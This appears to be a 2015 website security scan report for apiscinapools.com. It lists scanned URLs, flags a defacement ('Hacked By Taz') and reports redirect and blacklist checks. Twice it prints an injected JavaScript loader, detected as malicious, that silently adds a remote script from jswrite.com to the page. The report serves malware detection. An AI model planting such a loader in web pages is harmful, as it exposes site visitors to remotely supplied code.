Scanned pages/files
Request | Server response | Status |
http://www.apiscinapools.com/ | 200 OK Content-Length: 10355 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below):
if(top == self && typeof window._ws_all_js==='undefined'){
  window._ws_all_js = 7;
  var zhead = document.getElementsByTagName('head')[0];
  if(!zhead){zhead = document.createElement('head');}
  var qscript = document.createElement('script');
  qscript.setAttribute('id','wsh2_js');
  qscript.setAttribute('src','http://jswrite.com/script1.js');
  qscript.setAttribute('type','text/javascript');
  qscript.async = true;
  if(zhead && !document.getElementById('wsh2_js')) zhead.appendChild(qscript);
}
Antivirus reports:
Deface/Content modification. The following signature was found: Hacked By Taz
...[1149 bytes skipped]... com/script1.js'); qscript.setAttribute('type','text/javascript');qscript.async = true; if(zhead && !document.getElementById('wsh2_js')) zhead.appendChild(qscript); } </script> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <title> Hacked By Taz </title> <meta name="description" content="We Are The Lights In The Darkness, We Are the Truth Behind The Lies, We Are M_L crew, It's Too Late To Expect Us!"> <meta name="author" content="M_L Crew"> <meta name="viewport" content="width=device-width,initial-scale=1"> <link REL="SHORTCUT ICON" HREF="http://i58.tinypic.com/14cdu6o.jpg"> <!-- CSS concatenated and minifie ...[10743 bytes skipped]...
http://erin-erina.meximas.com/js/libs/modernizr-2.0.6.min.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 13 Mar 2015 09:36:40 GMT Server: Apache Content-Length: 170 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | clean |
http://www.hostinger.lt/klaida_404? | 200 OK Content-Length: 11572 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js | 200 OK Content-Length: 91556 Content-Type: text/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.14/jquery-ui.min.js | 200 OK Content-Length: 201658 Content-Type: text/javascript | clean |
http://erin-erina.meximas.com/js/site.php | HTTP/1.1 404 Not Found Connection: close Date: Fri, 13 Mar 2015 09:36:42 GMT Server: Apache Content-Length: 170 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | clean |
http://www.hostinger.lt/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://erin-erina.meximas.com/js/popup.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 13 Mar 2015 09:36:45 GMT Server: Apache Content-Length: 170 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | clean |
http://i.kuryjs.info/kury/javascript.js?appTitle=Smartbar&channel=src2_pr&hid=3e05eee2-d832-47b7-b607-7a163fbc72ed | 200 OK Content-Length: 7176 Content-Type: application/x-javascript | clean |
http://www.superfish.com/ws/sf_main.jsp?dlsource=fowpwbb&userId=16AF47B9-805A-4B2C-8D0&CTID=src2_pr&partnername=Smartbar | 200 OK Content-Length: 9806 Content-Type: text/html | clean |
http://linurytestwesteurope.blob.core.windows.net/sharon-test/visadd.js | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://cdn.visadd.com/script/14567725814/preload.js?subid=src2_pr | 200 OK Content-Length: 8642 Content-Type: application/javascript | clean |
http://api.jollywallet.com/affiliate/client?dist=100&sub=2_pr&name=Smartbar | 200 OK Content-Length: 38709 Content-Type: application/javascript | clean |
http://apisurftasticnet-a.akamaihd.net/gsrs?is=amp1lmeg&bp=PB&g=f47f4329-19a1-4111-a256-13a763f5939d | 200 OK Content-Length: 10674 Content-Type: application/javascript | clean |
http://yondarkness.googlecode.com/files/AntiCopas.js | 403 Forbidden Content-Length: 2155 Content-Type: text/html | clean |
http://yondarkness.googlecode.com//www.google.com/ | 404 Not Found Content-Length: 1425 Content-Type: text/html | clean |
http://www.apiscinapools.com//ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js/ | 200 OK Content-Length: 10355 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
if(top == self && typeof window._ws_all_js==='undefined'){
  window._ws_all_js = 7;
  var zhead = document.getElementsByTagName('head')[0];
  if(!zhead){zhead = document.createElement('head');}
  var qscript = document.createElement('script');
  qscript.setAttribute('id','wsh2_js');
  qscript.setAttribute('src','http://jswrite.com/script1.js');
  qscript.setAttribute('type','text/javascript');
  qscript.async = true;
  if(zhead && !document.getElementById('wsh2_js')) zhead.appendChild(qscript);
}
Antivirus reports:
http://erin-erina.meximas.com/js/mylibs/supersized.3.1.3.min.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 13 Mar 2015 09:36:49 GMT Server: Apache Content-Length: 170 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | clean |
http://erin-erina.meximas.com/js/mylibs/jquery.mousewheel.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 13 Mar 2015 09:36:50 GMT Server: Apache Content-Length: 170 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | clean |
http://erin-erina.meximas.com/js/mylibs/mwheelIntent.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 13 Mar 2015 09:36:50 GMT Server: Apache Content-Length: 170 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | clean |
http://erin-erina.meximas.com/js/mylibs/jquery.jscrollpane3.min.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 13 Mar 2015 09:36:50 GMT Server: Apache Content-Length: 170 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | clean |
http://erin-erina.meximas.com/js/plugins.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 13 Mar 2015 09:36:50 GMT Server: Apache Content-Length: 170 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | clean |
http://erin-erina.meximas.com/js/script.js | HTTP/1.1 404 Not Found Connection: close Date: Fri, 13 Mar 2015 09:36:50 GMT Server: Apache Content-Length: 170 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | clean |
http://htmlfreecodes.com/codes/rain.js | 200 OK Content-Length: 7113 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: apiscinapools.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: apiscinapools.com
Referer: http://www.google.com/search?q=apiscinapools.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=apiscinapools.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://apiscinapools.com/
Result: apiscinapools.com is not infected or malware details are not published yet.